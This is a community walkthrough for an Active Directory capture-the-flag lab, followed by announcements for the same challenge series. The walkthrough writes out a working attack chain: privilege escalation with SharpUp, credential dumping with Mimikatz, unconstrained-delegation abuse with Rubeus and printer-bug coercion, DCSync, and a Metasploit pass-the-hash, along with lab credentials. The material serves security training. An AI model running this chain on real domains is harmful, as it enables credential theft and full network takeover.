Human Connection Challenge: Season 1 – Active Directory Official Walkthrough Guide (Community Version)
Time’s Up! Congratulations to everyone who completed Lab 7: Active Directory from the Human Connection Challenge: Season 1. In this walkthrough, I'll share some strategies for efficiently completing the lab based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. This walkthrough uses placeholders for target IPs in brackets, such as <Kali IP>. Simply replace this with the actual IP of your Kali instance or the specific target. Let's get started! Task 1 What is the WS01 token in C:\Users\Administrator\Desktop\token.txt? The credentials panel gives you the following username and password combination for host WS01. offensive\jack.s:!nitialPass33. Use the following command to log in to WS01: xfreerdp /v:<WS01 IP> /u:jack.s /d:offensive +clipboard +drives /drive:home,/home/kali /dynamic-resolution The task asks you for the token in C:\users\Administrator\Desktop, so your first job is to escalate your privileges, since jack.s is only a low-level user. For this, you can transfer SharpUp.exe, found in /home/kali/Desktop/tools. Run all privilege escalation checks with the following command: SharpUp audit This gives you the credentials OffensiveAdmin:It’sBlankAnyway. You can now use the following command to RDP to WS01 as OffensiveAdmin: xfreerdp /v:<WS01 IP> /u:OffensiveAdmin +clipboard +drives /drive:home,/home/kali /dynamic-resolution With admin privileges, you can now read the token in C:\Users\Administrator\Desktop\token.txt. Task 2 What is the SRV01 token in C:\Users\tina.m\Desktop\token.txt? It’s clear from the task that we must get access to user tina.m who can connect to SRV01. With your new administrator privileges on WS01, open a task manager to check for possible user sessions. You’ll see that tina.m has a cmd.exe process running. This means you can now attempt to get their hash or password from memory using Mimikatz. mimikatz.exe privilege::debug sekurlsa::logonpasswords Using the credentials offensive\tina.m:PwdDump1ng1241, you can now log in to SRV01 and get your second token. Task 3 What is the DC token in C:\Users\Administrator\Desktop\token.txt? The last task asks you to connect to the DC, which means you need to become a domain administrator. Use PowerView-Dev.ps1 to enumerate the most common attack paths to Domain Admin. One of them would be unconstrained delegation. . .\PowerView-Dev.ps1 Get-DomainComputer -Unconstrained -Properties dnshostname It seems like SRV01 is trusted for unconstrained delegation. Since you have administrator privileges, you can obtain DC01’s ticket-granting ticket (TGT). First, transfer Rubeus.exe, and MS-RPRN.exe over to SRV01. Then, run Rubeus and monitor for tickets. Rubeus.exe monitor /interval:1 Then, force DC01 to make an SMB connection to SRV01 to grab the ticket. .\MS-RPRN.exe \\dc01.offensive.local \\srv01.offensive.local sed -i "s/ //g" ticket.txt tr -d "\n" < ticket.txt Then, on SRV01, run the following command to pass it. Rubeus.exe ptt /ticket:<formatted base64 encoded ticket> If you did all that correctly, running the command klist would reveal the Kerberos ticket for the machine account DC01$. Now, transfer mimikatz.exe and run the following command: mimikatz.exe lsadump::dcsync /user:administrator This will give you the hash 2c9299e44ee3abcf5c6f9e7938123334. You can now use Metasploit to connect to the DC, as follows: sudo msfconsole use exploit/windows/smb/psexec set smbuser administrator set smbpass aad3b435b51404eeaad3b435b51404ee:2c9299e44ee3abcf5c6f9e7938123334 set rhosts <DC IP> exploit Finally, you can drop into a shell and read the token at C:\Users\Administrator\Desktop\token.txt. Tools For this challenge, you’ll use a range of tools including: SharpUp PowerView Rubeus MS-RPRN Metasploit Tips When testing for web application vulnerabilities, remember that vulnerabilities may reside in any part of the application. Subtle elements that appear unimportant could prove exploitable if they neglect to handle inputs securely. So make sure you check all user input forms and any buttons or links that direct you to different parts of the application. To learn more about some of the tools used in this lab, take a look at the following collections: Windows Basics Privilege Escalation: Windows Introduction to Metasploit Introduction to Active Directory Attacks Kerberos Conclusion The steps I’ve laid out here aren’t the only way to find the answers to the questions. As long as you find the answers, you did it – well done! If you used an alternative method, or think there’s a better route to find some of the answers, let us and the rest of the community know in the comments below! I hope you enjoyed the challenge!The Human Connection Challenge Season 1 Finale is Here!
Since November we’ve been dropping a monthly community lab challenges and awarding limited edition challenge coins to the members who were: 🥇 First to Finish ⏱️ Fastest to Complete 🎯 Most Accurate 💪 Most Persistent However, all good things must come to an end, and so this month’s challenge will be the last of Season 1. But please don’t fret! To celebrate this occasion we have some awesome prizes up for grabs for anyone who completes a challenge lab before the 2nd June: 🥇 Tickets, Flights & Accommodation to an Immersive Summit in NYC or London 🥈 2 x PlayStation®5 Consoles 🥉 10 x Apple AirPods or JBL Headphones 👕 Much coveted Immersive swag and goodies! You can read all about the competition (including full terms and conditions) here. Ready to level up your cybersecurity skills and win some cool stuff? Dive into The Human Connection Challenge: Season 1 collection to get started!The Human Connection Challenge: Season 1 Episode 7 Is Now Live!
The 7th and final episode of Season 1 is here! Prove you skills in this Active Directory challenge! Welcome to the seventh instalment of the Human Connection Challenge: Season 1. This lab tests your ability to move around Active Directory and abuse its misconfigurations. As this is a challenge lab, you'll find limited information available to guide you. However, we've recently released the Introduction to Active Directory Attacks collection, where you can learn some of the most common AD attacks. This, combined with our already existing Kerberos collection, should give you all the tools necessary to complete this challenge. If you're new to the challenge, we reward the top-performing community members in the following categories with physical and digital challenge coins: 🥇 First to Finish ⏱️ Fastest to Complete 🎯 Most Accurate 💪 Most Persistent 🎁 Spot Prizes What's more, as this is the final episode of the season, we have some awesome prizes up for grabs if you complete one or more challenge lab before the 2nd June (Read more here). When the challenge ends, lab author StefanApostol will provide a walkthrough to guide you through the lab and share hints, tips and expert advice on how to approach this lab, so you can compare notes and learn techniques for the future. You're also very welcome to submit your own walkthrough guides to community@immersivelabs.com because we know that there are multiple methods you take to complete the challenge labs. We'll showcase any unique approaches taken. You can read more about Season 1 of the Human Connection Challenge here. To be in with a chance of a challenge coin you have until midnight on 23:59 BST on Sunday 1st June to complete episode 7! To find the lab in the Immersive Labs Platform, Click Exercise > Challenges & Scenarios > The Human Connection Challenge: Season 1 > Active Directory Good luck! 🤞The Human Connection Challenge: Season 1 Episode 6 Is Now Live!
Welcome to the sixth instalment of the Human Connection Challenge: Season 1. This lab tests your ability to analyze and exploit Thick Client applications. As this is a challenge lab, you'll find limited information available to guide you. Good luck! 🤞 If you're new to the challenge, we reward the top-performing community members in the following categories with physical and digital prizes, like our all-new challenge coin: 🥇 First to Finish ⏱️ Fastest to Complete 🎯 Most Accurate 💪 Most Persistent 🎁 Spot Prizes When the challenge ends, lab author StefanApostol will provide a walkthrough to guide you through the lab and share hints, tips and expert advice on how to approach this lab, so you can compare notes and learn techniques for the future. You're also very welcome to submit your own walkthrough guides to community@immersivelabs.com because we know that there are multiple methods you take to complete the challenge labs. We'll showcase any unique approaches taken. You can read more about Season 1 of the Human Connection Challenge here. To be in with a chance of a prize you have until midnight on Sunday 20th April to complete episode 6! To find the lab in the Immersive Labs Platform, Click Exercise > Challenges & Scenarios > The Human Connection Challenge: Season 1 > Thick Client 🔔 There are 7 labs within this series so make sure you're following the CHALLENGES Tag to get notified as soon as the final lab is released! Now it's time to take on that challenge! Let us know how you got on in the comments below!The Human Connection Challenge: Season 1 Episode 5 Is Now Live!
Each new challenge lab introduces a new area designed to put you to the test. This month, we're calling for you to show off your Windows skills! If you're new to the challenge, we reward the top-performing community members in the following categories with physical and digital prizes, like our all-new challenge coin: 🥇 First to Finish ⏱️ Fastest to Complete 🎯 Most Accurate 💪 Most Persistent 🎁 Spot Prizes When the challenge ends, lab author StefanApostol will provide a walkthrough to guide you through the lab and share hints, tips and expert advice on how to approach this lab, so you can compare notes and learn techniques for the future. You're also very welcome to submit your own walkthrough guides to community@immersivelabs.com because we know that there are multiple methods you take to complete the challenge labs. We'll showcase any unique approaches taken. You can read more about Season 1 of the Human Connection Challenge here. To be in with a chance of a prize you have until midnight on Sunday 23rd March to complete episode 5! To find the lab in the Immersive Labs Platform, Click Exercise > Challenges & Scenarios > The Human Connection Challenge: Season 1 > Windows 🔔 Don’t miss out – there are 4 more labs to come in this challenge series. Make sure you're following the CHALLENGES Tag to get notified as soon as each one is released. Good Luck! 🤞The Human Connection Challenge: Season 1 Episode 4 Is Now Live!
In this lab we’ll test your Linux skills but other than that, you’ll find limited information available to guide you. As a reminder, we reward the top performing community members in the following categories: 🥇 First to Finish ⏱️ Fastest to Complete 🎯 Most Accurate 💪 Most Persistent 🎁 Spot Prizes In addition, at the end of the month, BethHolden will provide a walkthrough to guide you through the lab and share hints, tips and expert advice on how to approach similar labs in the future. We also encourage you to submit your own walkthrough guides to community@immersivelabs.com and we will feature any unique approaches in their own Community Walkthrough Guide. You can read more about Season 1 of the Human Connection Challenge here. To be in with a chance of a prize you have until midnight on Sunday 23rd February 2025 to complete episode 4! To find the lab in the Immersive Labs Platform, Click Exercise > Challenges & Scenarios > The Human Connection Challenge: Season 1 > Linux 🔔 Don’t miss out – there are 3 more labs to come in this challenge series. Make sure you're following the CHALLENGES Tag to get notified as soon as each one is released. Good Luck!
